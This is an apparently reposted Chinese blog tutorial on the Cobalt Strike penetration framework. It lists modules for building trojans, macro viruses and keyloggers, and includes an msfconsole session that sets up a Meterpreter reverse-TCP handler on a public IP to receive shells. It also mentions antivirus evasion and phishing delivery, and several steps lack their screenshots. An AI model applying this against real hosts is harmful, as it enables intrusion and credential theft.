本文主要是介绍【Cobalt strike 渗透测试神器】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
一、前言
安装包下载
主机详情
二、部分模块和Payload介绍
三、基本使用步骤
1. 服务端和客户端
2. 设置监听
四、配合其他工具反弹shell
1. kali中使用msf
2. CS创建监听
3. metasploit使用exploit 模块
一、前言
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具i并且在攻防测试团队协作方面堪称利器,因此广受黑客喜爱。Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但要想好玩的话,一定要架设在外网上。
安装包下载
官网下载: https://www.cobaltstrike.com
博主资源免费下载:https://download.csdn.net/download/qq_55213436/85003580
主机详情
公网服务器:IP地址---:47.108.44.4 操作系统:Linux。
客户端:IP地址---:192.168.43.114 操作系统:Windows。
受害机:IP地址---:192.168. 175.146 操作系统:win7。
二、部分模块和Payload介绍
New Connection | 新建连接,支持连接多个服务器端 |
Preferences | 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录 |
Visualization | 主要展示输出结果的视图 |
VPN Interfaces | 设置VPN接口 |
Listenrs | 创建监听器 |
Script Manager | 脚本管理,可以通过AggressorScripts脚本来加强自身,可以扩展菜单栏,Beacon命令行,提权脚本 |
Close | 退出 |
Applications | 显示受害主机的应用信息 |
Credentials | 显示所有以获取的受害主机的凭证,如hashdump、Mimikatz |
Downloads | 查看已下载文件 |
Event Log | 主机上线记录以及团队协作聊天记录 |
Keystrokes | 查看键盘记录结果 |
Proxy Pivots | 查看代理模块 |
Screenshots | 查看所有屏幕截图 |
Script Console | 加载第三方脚本以增强功能 |
Targets | 显示所有受害主机 |
HTML Application | 生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件 |
MS Office Macro | 生成office宏病毒文件 |
Payload Generator | 生成各种语言版本的payload |
USB/CD AutoPlay | 生成利用自动播放运行的木马文件 |
Windows Dropper | 捆绑器能够对任意的正常文件进行捆绑 |
Windows Executable | 生成可执行exe木马 |
Windows Executable(Stageless | 生成无状态的可执行exe木马 |
Activity Report | 活动报告 |
Hosts Report | 主机报告 |
Indicators of Compromise | IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes |
Sessions Report | 会话报告 |
Social Engineering Report | 社会工程报告:包括鱼叉钓鱼邮件及点击记录 |
Tactics, Techniques, and Procedures | 战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略 |
Reset Data | 重置数据 |
Export Data | 导出数据,导出.tsv文件格式 |
三、基本使用步骤
1. 服务端和客户端
启动服务端
进入到CS的安装目录下,执行如下的操作:
客户端上线,打开CS的Windows客户端程序,即cobaltstrike.exe,后输入如下信息:
成功连接上公网的CS服务器
2. 设置监听
创建监听器:
3. 创建payload
创建payload,等待目标主机上线。在本次演示实验中,关闭所有的杀毒软件和firewall。在实际的攻击过程中,我们肯定是要对payload做“免杀”来规避杀毒软件的检测,具体的免杀操作和规避杀毒软件的监测后续会有相应的介绍。
木马程序如下:
运行对应的木马程序,则可以在CS的客户端返回对应的受害机的相关信息:
拿到主机的权限后就可以执行后渗透操作:
其实我们可以结合其他的方式来增加攻击的隐蔽性和跨时空性。如:结合伪造邮件、嵌入到隐蔽的文件中。
四、配合其他工具反弹shell
此处以CS配合metasploit实现反弹shell,达到能够使用metasploit的相应工具实现对目标主机的渗透操作。(效果很棒!)
1. kali中使用msf
──(root💀kali)-[~]
└─# msfconsole______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|=[ metasploit v6.1.14-dev ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn moremsf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Wildcard Targetmsf6 exploit(multi/handler) > set lhost 47.108.217.53
lhost => 47.108.217.53
msf6 exploit(multi/handler) > set lport 66
lport => 66
msf6 exploit(multi/handler) >
2. CS创建监听
使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。(在下这儿截错图啦:下面的第一张图中HOST的IP地址应该为kali的IP地址!!!)
然后选择我们之前创建的:Windows/foreign/reverse_http选项,点击choose。
3. metasploit使用exploit 模块
使用命令:输入shell命令后 ,进入dos界面,输入命令:chcp 65001即可解除乱码。
至此CS配合metasploit就成功啦。我们可以使用metasplit上的工具进行愉快的玩耍啦。
(CS还有很多非常棒的功能:如构建隧道等后期还应该加强对其学习和深入利用。)
这篇关于【Cobalt strike 渗透测试神器】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!